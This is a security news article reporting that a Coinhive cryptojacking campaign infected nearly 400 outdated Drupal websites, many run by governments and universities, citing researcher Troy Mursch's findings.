Threat Management, Threat Management, Network Security

Cryptojacking campaign hits 400 Drupal-based sites, many run by governments and universities

Nearly 400 websites running outdated and vulnerable versions of the Drupal content management system, many affiliated with governments and educational institutions, were recently discovered to be infected with Coinhive-based cryptomining software.

In a May 5 post on his "Bad Packets Report" blog site, security researcher Troy Mursch says that the  Monero cryptojacking campaign he uncovered compromised 391 sites in total, more than a quarter of which are U.S.-based. Prominent victims included the San Diego Zoo, Lenovo, DLink (Brazil), UCLA, the National Labor Relations Board, the Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC), and the government of Chihuahua, Mexico.

Mursch explains that the sites all had Coinhive or a throttled implementation of Coinhive injected into a JavaScript library. All of the sites had a Coinhive site key that pointed to the domain vuuwd.com, which was registered with fraudulent WHOIS information and has been used in previous Monero mining operations.

The researcher notes that the attacker was sloppy in that he used a self-signed SSL certificate instead of a trusted one, meaning the payload is not injected using HTTPS. Consequently, in at least some cases, Coinhive failed to load on the sites because the connection to the server was blocked.

Drupal-based websites have emerged as an alluring target for cryptomining campaigns of late, following the discovery of the Drupalgeddon 2.0 vulnerability that was patched last March. It is not clear if the attackers in this case exploited this particular bug, however.

"We've seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks," Mursch writes. "This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.